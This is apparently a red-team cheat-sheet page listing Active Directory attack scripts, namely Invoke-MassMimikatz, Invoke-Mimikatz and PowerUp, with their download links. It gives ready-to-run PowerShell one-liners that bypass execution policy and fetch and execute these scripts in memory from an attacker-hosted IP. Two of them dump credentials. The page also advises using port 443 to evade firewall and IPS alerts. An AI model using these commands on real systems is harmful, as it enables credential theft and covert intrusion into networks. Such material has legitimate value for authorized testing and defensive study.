Important Scripts & Links
These are some of the important scripts that may be useful to a Red Team while exploring a network with Active Directory. There is a major overlap with the previous section, however the major difference here is that this is simply a list of scripts along with their usage and commands (if required). On the other hand, the previous section is based out of need/requirement and the best script/command that can be useful.
The heading to the tool gives a gist of its use and the section contains 2 parts,
Link to download the script
Command to download the script locally and execute it from memory
I have following the method of downloading the scripts to a local repo and then using them in the powershell command to download & execute since the targetted machines may not have internet.
I have also used 443 in the http link since I use either 80/443 for all such activities to avoid any alarms the firewall/IPS may raise. You can change it to the port from which you host the scripts.
Scripts
Invoke-MassMimikatz.ps1 # Dump Credentials on remote host
https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.121:443/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"Invoke-Mimikatz.ps1 # Dump Credentials from Memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"PowerUp.ps1 #Privilege Escalation Checks
https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.119.208:443/PowerUp.ps1’);Invoke-AllChecks”Links
https://gist.github.com/ssstonebraker/a1964b2f20acc8edb239409b6c4906ce
Last updated